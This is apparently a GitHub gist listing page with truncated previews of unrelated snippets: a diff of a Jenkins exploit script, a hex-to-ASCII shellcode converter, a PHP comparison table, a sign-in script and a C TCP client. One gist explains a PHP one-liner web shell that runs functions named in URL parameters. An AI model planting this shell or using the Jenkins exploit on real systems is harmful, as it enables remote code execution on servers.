Skip to content

Instantly share code, notes, and snippets.

--- exploit.py 2019-02-26 18:43:27.142543504 -0500
+++ exploit_noverify.py 2019-02-26 18:45:43.523191756 -0500
@@ -10,6 +10,7 @@
import jenkins
import time
from xml.etree import ElementTree
+import os
payload = '''
import org.buildobjects.process.ProcBuilder
#!/usr/bin/python
# Takes a string from command line, strips spaces and hex delimiters, and returns ASCII equivalent
# Usage example:
# $ python hexconvert.py --hex "x6d\X79 X20 X73\x68\x65\x6c\x6c\x63\x6f\x64\x65"
# my shellcode
import sys, argparse
// "===" means that they are identical
// "==" means that they are equal
// "!=" means that they aren't equal.
false null array() 0 "0" 0x0 "0x0" "000" "0000"
false === == == == == == != != !=
null == === == == != == != != !=
array() == == === != != != != != !=
0 == == != === == === == == ==
"0" == != != == === == == == ==
@jaml
jaml / gist:10436887
Last active June 21, 2022 11:55
PHP explanation for <?=($_=@$_GET[2]).@$_($_GET[1])?>
<?= PHP short opening tag
(
$_ temporary variable
= assignment (of temporary variable $_)
@ suppress PHP errors
$_GET[2] value corresponding to key 2 in array of values of HTTP GET (these are the arguments you see in a URL like ?argument1=foo&argument2=foo2)
@jaml
jaml / signin.sh
Created November 21, 2012 04:00
Quick & dirty script for sign-in for instalfests
#!/bin/bash
# Quick & dirty script for sign-in for instalfests
while [ 1 ]; do
while [ -z "$fname" ]; do
echo "First Name: "
read fname
done
while [ -z "$lname" ]; do
@jaml
jaml / testclient.c
Created May 16, 2012 07:45
Simple IPv4 TCP client for diagnosing whether issues are with the proxy or the client (for CS118 project)
/* -*- Mode:C++; c-file-style:"gnu"; indent-tabs-mode:nil; -*- */
// CS118 - Project 1
#include <iostream>
#include <string>
#include <cstring>
#include <stdio.h>
// includes for socket, bind, connect, listen, accept, read, recv, write, send,
//gethostbyname, Hostent, sockaddr_in, sockaddr
#include <sys/types.h>